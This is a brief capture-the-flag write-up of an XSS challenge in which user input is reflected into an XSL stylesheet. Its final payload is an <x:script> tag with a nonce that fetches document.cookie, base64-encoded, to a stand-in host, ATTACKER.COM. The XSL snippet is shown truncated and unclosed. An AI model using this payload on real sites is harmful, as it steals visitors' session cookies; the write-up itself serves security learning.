Let's start by warming a little bit! I love planets and I hate sheets so I made this website to show my favorite planets. Flag is in admin cookie. Link:

In this challenge our input is reflected into an XSL document. For instance:

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0"
<xsl:template match="/">
OUR INPUT    <xsl:for-each select="catalog/cd">
      <xsl:value-of select="title"/>
      <xsl:if test="position() < last()-1">
        <xsl:text>, </xsl:text>
      <xsl:if test="position()=last()-1">
        <xsl:text>, and </xsl:text>
      <xsl:if test="position()=last()">


When rendered in the browser, this yields an error.

Since the Content-Type is text/xsl, we can use <x:script> to perform XSS (source).

The final payload was

<x:script xmlns:x="" nonce="Y8Ret8N5CPXrSG">fetch(`http://ATTACKER.COM/${btoa(document.cookie)}`)</x:script>

Last updated